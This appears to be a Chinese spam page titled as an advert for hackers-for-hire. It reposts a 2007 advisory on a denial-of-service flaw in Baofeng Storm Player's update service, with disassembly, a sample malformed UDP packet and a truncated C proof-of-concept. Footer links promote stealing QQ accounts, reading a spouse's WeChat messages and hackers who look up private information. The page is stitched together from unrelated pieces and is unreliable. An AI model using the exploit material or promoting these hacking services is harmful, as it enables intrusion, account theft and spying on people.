先办事后付款的黑客 先做再付黑客联系方式
传说中的《暴风影音3》新版本爆漏洞,这次很夸张,远程拒绝服务.吐血写出来的软件还是没过关起因是暴风影音自动更新程序会在远程监听一个端口,如果向其发送畸形数据包,就会导致自动更新程序崩溃;如果对其发送精心构造过的数据包,则足以导致用户主机在不知情的情况下被完全控制.以下是帖子全文: CISVul20071128 暴风影音3.7.11.13 DOS Vul |=----------------[ 暴风影音3.7.11.13 DOS Vulnerabilities ]-------=||=-----------------------------------------------------------------=||=---------------=[ TuTu ]=-----------------------------=||=-----------------------------------------------------------------=||=---------------=[ Copyright:www.cisrg.cn ]=----------------------=| --] 介绍暴风影音是一款播放软件,经过测试,暴风影音3.7.11.13存在一个远程DDOS漏洞。官方网站:http://www.baofeng.com/ --] Author:TuTu --] 漏洞分析/*++暴风影音3 Build version : 3.7.11.13 Test version : 3.7.11.13,自从带了一个自动升级服务stormlive.exe之后,会在本地开启一个UDP端口5354,向端口发送恶意封包可造成stormlive崩溃 0041DEE0 /$ 8B4424 08 mov eax, dword ptr [esp+8]0041DEE4 |. 53 push ebx0041DEE5 |. 8BD9 mov ebx, ecx0041DEE7 |. 56 push esi0041DEE8 |. 33C9 xor ecx, ecx0041DEEA |. 57 push edi0041DEEB |. 8943 08 mov dword ptr [ebx+8], eax0041DEEE |. 6A 04 push 4 ; /size = 40041DEF0 |. C1E8 07 shr eax, 7 ; |0041DEF3 |. 40 inc eax ; |0041DEF4 |. 894B 04 mov dword ptr [ebx+4], ecx ; |0041DEF7 |. C1E0 07 shl eax, 7 ; |0041DEFA |. 50 push eax ; |nitems 0041DEFB |. 884B 10 mov byte ptr [ebx+10], cl ; |0041DEFE |. C703 C0524300 mov dword ptr [ebx], 004352C0 ; |0041DF04 |. 8943 0C mov dword ptr [ebx+C], eax ; |0041DF07 |. FF15 78154300 call dword ptr [<&MSVCRT.calloc>] ; \calloc0041DF0D |. 8B4B 08 mov ecx, dword ptr [ebx+8]0041DF10 |. 8B7424 18 mov esi, dword ptr [esp+18]0041DF14 |. C1E1 02 shl ecx, 20041DF17 |. 8943 04 mov dword ptr [ebx+4], eax0041DF1A |. 8BF8 mov edi, eax0041DF1C |. 8BC1 mov eax, ecx0041DF1E |. 83C4 08 add esp, 80041DF21 |. C1E9 02 shr ecx, 20041DF24 |. F3:A5 rep movs dword ptr es:[edi], dword p> 溢出0041DF26 |. 8BC8 mov ecx, eax0041DF28 |. 83E1 03 and ecx, 30041DF2B |. F3:A4 rep movs byte ptr es:[edi], byte ptr>0041DF2D |. 8BCB mov ecx, ebx0041DF2F |. E8 3C140000 call 0041F3700041DF34 |. 5F pop edi0041DF35 |. 8BC3 mov eax, ebx0041DF37 |. 5E pop esi0041DF38 |. 5B pop ebx0041DF39 \. C2 0800 retn 8 封包例子00CAFF84 4B 55 44 50 01 00 55 55 55 00 55 55 55 00 KUDP .UUU.UUU.由于没有对封包中取得的数据进行判断.数据超大导致申请内存失败,后面的内存数据复制导致异常. --*/ --] exploit POC#ifndef WIN32_LEAN_AND_MEAN#define WIN32_LEAN_AND_MEAN#endif #include #include #include #pragma comment(lib, "ws2_32") // Set the packing to a 1 byte boundary#include //// Define the IPv4 header. Make the version and length field one// character since we can't declare two 4 bit fields without// the compiler aligning them on at least a 1 byte boundary.//typedef struct ip_hdr{unsigned char ip_verlen; // 4-bit IPv4 version// 4-bit header length (in 32-bit words)unsigned char ip_tos; // IP type of serviceunsigned short ip_totallength; // Total lengthunsigned short ip_id; // Unique identifierunsigned short ip_offset; // Fragment offset fieldunsigned char ip_ttl; // Time to liveunsigned char ip_protocol; // Protocol(TCP,UDP etc)unsigned short ip_checksum; // IP checksumunsigned int ip_srcaddr; // Source addressunsigned int ip_destaddr; // Source address} IPV4_HDR, *PIPV4_HDR, FAR * LPIPV4_HDR; ////
相关文章
怎样知道老婆给别人发的微信聊天信息
微信是我们生活中常用到的社交工具,有了它我们的生活变得更加多姿多彩。由于手机的内存有限,所以我们有时候不得不去定期的清理手机垃圾文件,有的时候甚至去会删除掉一些微信好友,觉得微信好友也占据空间。但是删...
封锁下的希腊圣诞节:aigo数码相机部分民众不遵守防疫措施
中新网12月27日电 据希腊《中希时报》报道,新冠疫情之下,希腊民众正在经历几十年来最不寻常的圣诞节。为避免人群聚集,希腊政府和教会对圣诞圣礼仪式进行了严格的限制。然而,仍有数十名希腊民众钻了出行...
找黑客帮忙盗qq一般收费多少-可能被黑客攻击的网站(网站被黑客攻击了怎么办)
找黑客帮忙盗qq一般收费多少相关问题 黑马化腾公司的黑客相关问题 苹果7id被黑客给了怎么解 史上最牛黑客是谁(黑客发家史)...
守护者智能锁好不好 守护者智能锁优势
深圳市守护者锁业有限公司是一家集智能卡打点系统的开拓、研制、出产及销售于一体的高新技能企业。多年来都受到了公共的青睐,而且他们的产物已经远销海外。下面是关于守护者智能锁好欠好 守护者智能锁优势的先...
奥克兰是哪个国家的?新西兰最大城市
“帆船之都”奥克兰:新西兰最大城市,也是全国经济中心气候宜人。 “帆船之都”奥克兰 新西兰是大洋洲主要的国家,位于澳大利亚东南部,国土主要由北岛和南岛两大岛屿以及附近的小岛组成,是一个岛屿国家...
私人黑客收徒(查私人信息的黑客)
一、私人黑客收徒(查私人信息的黑客)方法总结 1、那个黑客收徒,本人16,爱好计算机。收费的别进吧,没钱-百。很少有黑客愿意不收钱收你的有黑客要收徒的吗?有的收我,最好不要钱的不要拜什么的师因为高手...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!